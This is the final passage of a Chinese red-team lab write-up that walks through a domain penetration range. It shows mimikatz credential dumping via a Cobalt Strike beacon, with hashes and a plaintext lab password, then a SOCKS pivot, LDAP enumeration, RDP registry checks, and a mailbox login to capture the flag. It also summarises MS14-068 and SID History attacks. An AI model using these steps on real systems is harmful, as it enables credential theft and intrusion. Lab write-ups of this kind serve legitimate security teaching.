mimikatz sekurlsa::logonpasswordsTasked beacon to run mimikatz's sekurlsa::logonpasswords commandhost called home, sent: 788090 bytesreceived output:......Authentication Id : 0 ; 1101801 (00000000:0010cfe9)Session : Interactive from 1User Name : liuyuanDomain : REDTEAMLogon Server : OWALogon Time : 2024/3/30 9:48:34SID : S-1-5-21-3044561657-3490269564-1163119649-1131msv :CredentialKeysNTLM : ae4c0d5fb959fda8f4cb1d14a8376af4SHA1 : ba6d52c74ee28d9e99d3d08b80e6557f5d894942PrimaryUsername : liuyuanDomain : REDTEAMNTLM : ae4c0d5fb959fda8f4cb1d14a8376af4SHA1 : ba6d52c74ee28d9e99d3d08b80e6557f5d894942tspkg :wdigest :Username : liuyuanDomain : REDTEAMPassword : Admin123456kerberos :Username : liuyuanDomain : REDTEAM.LABPassword : Admin123456ssp :credman :......
抓到REDTEAMliuyuan的明文密码Admin123456
在OWA机器的会话开启一个SOKCS代理
配置Proxifier走这个代理隧道
使用ADExplorer登录域控查看LDAP
找到CN=liuyuan,OU=财务部,OU=渗透攻击红队,DC=redteam,DC=lab
liuyuan的邮箱账户为[email protected]
查看当前机器是否开启远程桌面
beacon> shell REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections[] Tasked beacon to run: REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections[] host called home, sent: 132 bytes[] received output:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerfDenyTSConnections REG_DWORD 0x0
0x0表示是开启的状态
查看远程桌面端口
beacon> shell REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /V PortNumber[] Tasked beacon to run: REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /V PortNumber[] host called home, sent: 144 bytes[] received output:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber REG_DWORD 0xd3d
端口是默认的3389
mstsc远程桌面使用liuyuan用户登录
运行桌面的OutLook客户端即可登录liuyuan的邮箱
在草稿箱找到Flag提示
最终flag:Flag{RedTeamAPT2023}
04
—
靶场总结
外网打点时使用自动化EXP遇到了disable_funtions的限制,需要自己手动bp抓包去复现漏洞,寻找突破口。这次的内网有一个子域一个父域,在子域中利用MS14-068获取到子域域控权限,后利用Sid History进行跨域攻击拿下父域域控,相比单纯的获取服务器权限,最后还多考察了域内机器的信息收集,通过远程桌面连接到域内个人机器,查看OutLook客户端来获取到最终的Flag
点点关注不迷路
喜欢的看官还请多多点赞转发
原文始发于微信公众号(sec0nd安全):内网靶场 | 渗透攻击红队APT域渗透靶场
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论